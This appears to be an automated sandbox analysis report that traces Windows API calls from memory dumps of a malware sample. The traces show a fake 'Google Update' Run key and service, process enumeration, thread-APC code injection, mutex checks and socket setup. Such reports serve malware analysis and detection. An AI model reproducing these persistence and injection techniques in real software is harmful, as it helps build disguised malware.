      • Part of subcall function 00401480: CloseHandle.KERNEL32(?), ref: 0040153B
    • CloseHandle.KERNEL32(00000000), ref: 00402670
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • VirtualProtect.KERNEL32(00438CB3,00000FE6,00000040), ref: 004178AC
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd

    Non-executed Functions

    APIs
    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 004023AA
    • CreateServiceW.ADVAPI32(00000000,googleupdate,Google Update Service,000F01FF,00000010,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,7C831F63), ref: 004023E4
    • RtlGetLastWin32Error.NTDLL ref: 004023EE
    • OpenServiceW.ADVAPI32(00000000,googleupdate,000F01FF), ref: 00402406
    • DeleteService.ADVAPI32(00000000,?,00402CB7,?,?,00000000), ref: 00402413
    • CloseServiceHandle.ADVAPI32(00000000), ref: 0040241C
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00402427
    • CloseServiceHandle.ADVAPI32(00000000), ref: 0040243C
    • CloseServiceHandle.ADVAPI32(00000000), ref: 0040243F
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000168,?,00000000), ref: 00402DDA
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00402DEF
    • StrStrIW.SHLWAPI(?,Roaming), ref: 00402E07
    • lstrcpyW.KERNEL32(00000000,Local), ref: 00402E13
    • lstrcatW.KERNEL32(?,00404258), ref: 00402E2B
    • lstrlenW.KERNEL32(?), ref: 00402E34
    • StrStrIW.SHLWAPI(?,?), ref: 00402E52
    • StrStrIW.SHLWAPI(?,temp), ref: 00402E68
    • GetCommandLineW.KERNEL32 ref: 00402E72
    • StrStrIW.SHLWAPI(00000000,?), ref: 00402E82
    • DeleteFileW.KERNEL32(00000000), ref: 00402E91
    • Sleep.KERNEL32(00000064), ref: 00402EA1
    • DeleteFileW.KERNEL32(00000000), ref: 00402EA9
      • Part of subcall function 00402CF0: lstrlenW.KERNEL32(?), ref: 00402CFB
      • Part of subcall function 00402CF0: lstrcpyW.KERNEL32(?,00404320), ref: 00402D18
      • Part of subcall function 00402CF0: lstrcatW.KERNEL32(?,ftware\Mi), ref: 00402D30
      • Part of subcall function 00402CF0: lstrcatW.KERNEL32(?,crosoft\Wi), ref: 00402D3E
      • Part of subcall function 00402CF0: lstrcatW.KERNEL32(?,ndows\CurrentVers), ref: 00402D4C
      • Part of subcall function 00402CF0: lstrcatW.KERNEL32(?,ion\Run), ref: 00402D5A
      • Part of subcall function 00402CF0: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,0040425C,00000000,00000002,00000000,?,00000000), ref: 00402D7B
      • Part of subcall function 00402CF0: RegSetValueExW.ADVAPI32(?,GoogleUpdate,00000000,00000001,?,00000002), ref: 00402D98
      • Part of subcall function 00402CF0: RegCloseKey.ADVAPI32(?), ref: 00402DA2
    • OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00402EC6
    • CloseHandle.KERNEL32(00000000), ref: 00402ED1
    • ExitProcess.KERNEL32(00000000,?,00000000), ref: 00402ED9
      • Part of subcall function 00402AA0: CreateFileMappingW.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 00402AB9
      • Part of subcall function 00402AA0: MapViewOfFile.KERNEL32(00000000,0000000E,00000000,00000000,00000000), ref: 00402ACE
      • Part of subcall function 004025A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004025B8
      • Part of subcall function 004025A0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004025C8
      • Part of subcall function 004025A0: lstrcmpiW.KERNEL32(?,00000000), ref: 004025EB
      • Part of subcall function 004025A0: Process32NextW.KERNEL32(00000000,0000022C), ref: 0040260A
      • Part of subcall function 004025A0: CloseHandle.KERNEL32(00000000), ref: 00402618
      • Part of subcall function 004025A0: RtlGetLastWin32Error.NTDLL ref: 0040261E
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(00000000), ref: 004011A4
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(1/@), ref: 004011DE
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(?), ref: 00401228
    • lstrcatW.KERNEL32(?,?), ref: 00402F41
    • lstrcatW.KERNEL32(?,.exe), ref: 00402F4F
      • Part of subcall function 00401320: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401344
      • Part of subcall function 00401320: GetFileSize.KERNEL32(00000000,00000000), ref: 00401353
      • Part of subcall function 00401320: CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00401377
      • Part of subcall function 00401320: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004013C6
      • Part of subcall function 00401320: SetFilePointer.KERNEL32(00000000,-00000200,00000000,00000000), ref: 004013D6
      • Part of subcall function 00401320: ReadFile.KERNEL32(00000000,?,00000200,00000000,00000000), ref: 004013FA
      • Part of subcall function 00401320: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00401427
      • Part of subcall function 00401320: CloseHandle.KERNEL32(00000000), ref: 00401457
      • Part of subcall function 00401320: CloseHandle.KERNEL32(00000000), ref: 0040145E
    • SetServiceStatus.ADVAPI32(00000000,00405014), ref: 004030C1
      • Part of subcall function 00401550: lstrlenW.KERNEL32(?), ref: 0040155C
      • Part of subcall function 00401550: RtlAllocateHeap.NTDLL(00970000,00000008,00000000), ref: 00401572
      • Part of subcall function 00401550: lstrlenW.KERNEL32(|/@), ref: 004015A1
      • Part of subcall function 00401550: RtlAllocateHeap.NTDLL(00970000,00000008), ref: 004015B7
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 004015CD
      • Part of subcall function 00401550: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0040163F
      • Part of subcall function 00401550: CloseHandle.KERNEL32(?), ref: 00401653
      • Part of subcall function 00401550: CloseHandle.KERNEL32(?), ref: 00401659
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040166A
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401676
    • ExitProcess.KERNEL32(00000000), ref: 00402F81
    • RegisterServiceCtrlHandlerW.ADVAPI32(Google Update Service,004030D0), ref: 00402F9B
    • SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00402FFF
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040300A
    • RtlGetLastWin32Error.NTDLL ref: 00403025
    • SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00403042
    • SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00403072
    • CreateThread.KERNEL32(00000000,00000000,00403130,00000000), ref: 0040307E
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403087
    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403093
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • NtMapViewOfSection.NTDLL(00000000,00000000,?,00000000), ref: 0040286D
    • GetProcessId.KERNEL32(00000000), ref: 00402893
    • GetProcessId.KERNEL32(00000000), ref: 0040289A
    • VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000004), ref: 004028A9
    • NtQuerySystemInformation.NTDLL(00000005,00000000,00020000,?), ref: 004028CE
    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 0040291D
    • OpenThread.KERNEL32(00000010,00000000,00000000), ref: 00402927
    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 00402939
    • RtlGetLastWin32Error.NTDLL ref: 0040293F
    • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00402952
    • GetProcAddress.KERNEL32(00000000), ref: 00402959
    • RtlGetLastWin32Error.NTDLL ref: 00402976
    • CloseHandle.KERNEL32(00000000), ref: 0040297F
    • Sleep.KERNEL32(00001388), ref: 0040299C
    • OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 004029AE
    • CloseHandle.KERNEL32(00000000), ref: 004029DE
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402A06
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • lstrlenW.KERNEL32(?), ref: 00402CFB
    • lstrcpyW.KERNEL32(?,00404320), ref: 00402D18
    • lstrcatW.KERNEL32(?,ftware\Mi), ref: 00402D30
    • lstrcatW.KERNEL32(?,crosoft\Wi), ref: 00402D3E
    • lstrcatW.KERNEL32(?,ndows\CurrentVers), ref: 00402D4C
    • lstrcatW.KERNEL32(?,ion\Run), ref: 00402D5A
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,0040425C,00000000,00000002,00000000,?,00000000), ref: 00402D7B
    • RegSetValueExW.ADVAPI32(?,GoogleUpdate,00000000,00000001,?,00000002), ref: 00402D98
    • RegCloseKey.ADVAPI32(?), ref: 00402DA2
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • RtlGetLastWin32Error.NTDLL ref: 004026AE
      • Part of subcall function 00402210: RtlGetLastWin32Error.NTDLL ref: 00402274
    • GetProcessId.KERNEL32(00000000), ref: 004026E2
    • VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000004), ref: 004026F9
    • NtQuerySystemInformation.NTDLL(00000005,00000000,00020000,?), ref: 0040271E
    • OpenThread.KERNEL32(00000010,00000000,00000000), ref: 00402774
      • Part of subcall function 004022D0: wsprintfW.USER32 ref: 00402380
      • Part of subcall function 004022D0: OutputDebugStringW.KERNEL32(?), ref: 00402390
    • CloseHandle.KERNEL32(00000000), ref: 004027B2
    • Sleep.KERNEL32(00001388), ref: 004027BC
    • OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 004027CE
    • CloseHandle.KERNEL32(00000000), ref: 004027F4
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0040281C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • OpenSemaphoreW.KERNEL32 ref: 00401B16
    • GetModuleHandleW.KERNEL32 ref: 00401BA4
    • RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 00401C87
    • lstrcmpiW.KERNEL32(ntdll.dll,00000000), ref: 00401D24
    • GetModuleHandleW.KERNEL32(00000000), ref: 00401D30
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401D40
    • GetModuleHandleW.KERNEL32(00000000), ref: 00401D6C
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401D93
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 00401F90
    • RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 00401FD5
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401FF2
    • RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 00402039
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 004020DB
      • Part of subcall function 004016E0: RtlFreeHeap.NTDLL(00970000,00000000,?), ref: 004016F9
    • RtlFreeHeap.NTDLL(00970000,00000000), ref: 004020AF
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 004020C2
    • RtlFreeHeap.NTDLL(00970000,00000000), ref: 0040210E
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00402121
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040213A
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 00402515
    • FindResourceW.KERNEL32(00000000,xfevepwmw,0000000A), ref: 00402525
    • LoadResource.KERNEL32(00000000,00000000), ref: 00402533
    • SizeofResource.KERNEL32(00000000,00000000), ref: 00402541
    • LockResource.KERNEL32(00000000), ref: 0040254D
    • GetCurrentProcess.KERNEL32 ref: 0040255D
    • IsWow64Process.KERNEL32(00000000), ref: 00402564
      • Part of subcall function 00402450: GetModuleHandleW.KERNEL32(00000000), ref: 00402454
      • Part of subcall function 00402450: FindResourceW.KERNEL32(00000000,vdfd1f6ed,0000000A), ref: 00402464
      • Part of subcall function 00402450: LoadResource.KERNEL32(00000000,00000000), ref: 00402476
      • Part of subcall function 00402450: SizeofResource.KERNEL32(00000000,00000000), ref: 00402488
      • Part of subcall function 00402450: LockResource.KERNEL32(00000000), ref: 00402494
      • Part of subcall function 004024B0: GetModuleHandleW.KERNEL32(00000000), ref: 004024B4
      • Part of subcall function 004024B0: FindResourceW.KERNEL32(00000000,be2e393ne,0000000A), ref: 004024C4
      • Part of subcall function 004024B0: LoadResource.KERNEL32(00000000,00000000), ref: 004024D6
      • Part of subcall function 004024B0: SizeofResource.KERNEL32(00000000,00000000), ref: 004024E8
      • Part of subcall function 004024B0: LockResource.KERNEL32(00000000), ref: 004024F4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
      • Part of subcall function 00402AA0: CreateFileMappingW.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 00402AB9
      • Part of subcall function 00402AA0: MapViewOfFile.KERNEL32(00000000,0000000E,00000000,00000000,00000000), ref: 00402ACE
      • Part of subcall function 004025A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004025B8
      • Part of subcall function 004025A0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004025C8
      • Part of subcall function 004025A0: lstrcmpiW.KERNEL32(?,00000000), ref: 004025EB
      • Part of subcall function 004025A0: Process32NextW.KERNEL32(00000000,0000022C), ref: 0040260A
      • Part of subcall function 004025A0: CloseHandle.KERNEL32(00000000), ref: 00402618
      • Part of subcall function 004025A0: RtlGetLastWin32Error.NTDLL ref: 0040261E
    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 00402B4F
    • OpenProcess.KERNEL32(00000408,00000000,00000340), ref: 00402B5D
      • Part of subcall function 00402680: RtlGetLastWin32Error.NTDLL ref: 004026AE
      • Part of subcall function 00402680: GetProcessId.KERNEL32(00000000), ref: 004026E2
      • Part of subcall function 00402680: VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000004), ref: 004026F9
      • Part of subcall function 00402680: NtQuerySystemInformation.NTDLL(00000005,00000000,00020000,?), ref: 0040271E
      • Part of subcall function 00402680: OpenThread.KERNEL32(00000010,00000000,00000000), ref: 00402774
      • Part of subcall function 00402680: CloseHandle.KERNEL32(00000000), ref: 004027B2
      • Part of subcall function 00402680: Sleep.KERNEL32(00001388), ref: 004027BC
      • Part of subcall function 00402680: OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 004027CE
      • Part of subcall function 00402680: CloseHandle.KERNEL32(00000000), ref: 004027F4
      • Part of subcall function 00402680: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0040281C
    • CloseHandle.KERNEL32(00000000), ref: 00402B6F
    • RtlGetLastWin32Error.NTDLL ref: 00402B77
    • OpenProcess.KERNEL32(00000408,00000000,00000340), ref: 00402B85
    • GetModuleHandleW.KERNEL32(00000000), ref: 00402B9F
      • Part of subcall function 00402830: NtMapViewOfSection.NTDLL(00000000,00000000,?,00000000), ref: 0040286D
      • Part of subcall function 00402830: GetProcessId.KERNEL32(00000000), ref: 00402893
      • Part of subcall function 00402830: GetProcessId.KERNEL32(00000000), ref: 0040289A
      • Part of subcall function 00402830: VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000004), ref: 004028A9
      • Part of subcall function 00402830: NtQuerySystemInformation.NTDLL(00000005,00000000,00020000,?), ref: 004028CE
      • Part of subcall function 00402830: RtlRestoreLastWin32Error.NTDLL(00000000), ref: 0040291D
      • Part of subcall function 00402830: OpenThread.KERNEL32(00000010,00000000,00000000), ref: 00402927
      • Part of subcall function 00402830: RtlRestoreLastWin32Error.NTDLL(00000000), ref: 00402939
      • Part of subcall function 00402830: RtlGetLastWin32Error.NTDLL ref: 0040293F
      • Part of subcall function 00402830: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00402952
      • Part of subcall function 00402830: GetProcAddress.KERNEL32(00000000), ref: 00402959
      • Part of subcall function 00402830: RtlGetLastWin32Error.NTDLL ref: 00402976
      • Part of subcall function 00402830: CloseHandle.KERNEL32(00000000), ref: 0040297F
      • Part of subcall function 00402830: Sleep.KERNEL32(00001388), ref: 0040299C
      • Part of subcall function 00402830: OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 004029AE
      • Part of subcall function 00402830: CloseHandle.KERNEL32(00000000), ref: 004029DE
      • Part of subcall function 00402830: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402A06
    • CloseHandle.KERNEL32(00000000), ref: 00402B97
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 004024B4
    • FindResourceW.KERNEL32(00000000,be2e393ne,0000000A), ref: 004024C4
    • LoadResource.KERNEL32(00000000,00000000), ref: 004024D6
    • SizeofResource.KERNEL32(00000000,00000000), ref: 004024E8
    • LockResource.KERNEL32(00000000), ref: 004024F4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 00402454
    • FindResourceW.KERNEL32(00000000,vdfd1f6ed,0000000A), ref: 00402464
    • LoadResource.KERNEL32(00000000,00000000), ref: 00402476
    • SizeofResource.KERNEL32(00000000,00000000), ref: 00402488
    • LockResource.KERNEL32(00000000), ref: 00402494
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000168), ref: 00403149
    • CreateProcessW.KERNEL32(?,0040425C,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 0040319F
    • CloseHandle.KERNEL32(?), ref: 004031B0
    • CloseHandle.KERNEL32(?), ref: 004031B7
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • QueryPerformanceCounter.KERNEL32(00000000), ref: 004011A4
    • QueryPerformanceCounter.KERNEL32(1/@), ref: 004011DE
    • QueryPerformanceCounter.KERNEL32(?), ref: 00401228
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
      • Part of subcall function 00401710: RtlRestoreLastWin32Error.NTDLL(00000000), ref: 004017C3
    • wsprintfW.USER32 ref: 00402380
    • OutputDebugStringW.KERNEL32(?), ref: 00402390
    Strings
    • ZwQueueApcThread: error code = %x, xrefs: 0040237A
    • ZwQueueApcThread, xrefs: 00402315
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004012A6
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 004012B5
    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004012D1
    • WriteFile.KERNEL32(00000000,?,00000000,00000000), ref: 004012F5
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 003E014E
    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 003E0275
    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 003E029A
    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?), ref: 003E02EE
    • LoadLibraryA.KERNEL32(?), ref: 003E0339
    • VirtualProtect.KERNEL32(?,00001000,00000002,?), ref: 003E0433
    • VirtualProtect.KERNEL32(?,?,00000001,?,?), ref: 003E0482
    Memory Dump Source
    • Source File: 00000005.00000002.410163326.003E0000.00000040.sdmp, Offset: 003E0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_3e0000_yDDWPXuvXqBkqjT.jbxd

    Non-executed Functions

    Executed Functions

    APIs
      • Part of subcall function 00EF6B72: lstrlenW.KERNEL32(0290BAD8), ref: 00EF6B7B
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • CreateNamedPipeW.KERNEL32(00FCFDB0,00000003,00000006,000000FF,00800000,00800000,00000000,00000000), ref: 00EF6BF7
    • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 00EF6C06
    • GetLastError.KERNEL32(?,?,?,00FCFDB0), ref: 00EF6C10
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • CreateThread.KERNEL32(00000000,00000000,00EF6A7A,00000000), ref: 00EF6C4F
    • CloseHandle.KERNEL32(00000000), ref: 00EF6C64
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • socket.WS2_32(00000002,00000002,00000000), ref: 00EFA79B
    • bind.WS2_32(00000000,0294FED0,00000010), ref: 00EFA7D0
    • WSAGetLastError.WS2_32 ref: 00EFA7DB
    • closesocket.WS2_32(00000000), ref: 00EFA7E4
    • WSASetLastError.WS2_32(00000000), ref: 00EFA7EB
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 00EFA8B2
    • WSAGetLastError.WS2_32 ref: 00EFA8BD
    • recvfrom.WS2_32(00000102,00000000,00000000,00000000,FFFECD63,00000010), ref: 00EFA8D7
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • htons.WS2_32(00000001), ref: 00EFAF0B
      • Part of subcall function 00EFAD6A: GetTickCount.KERNEL32 ref: 00EFAD9F
      • Part of subcall function 00EFAD6A: GetTickCount.KERNEL32 ref: 00EFAE03
      • Part of subcall function 00EFAD6A: htons.WS2_32(00000101), ref: 00EFAE64
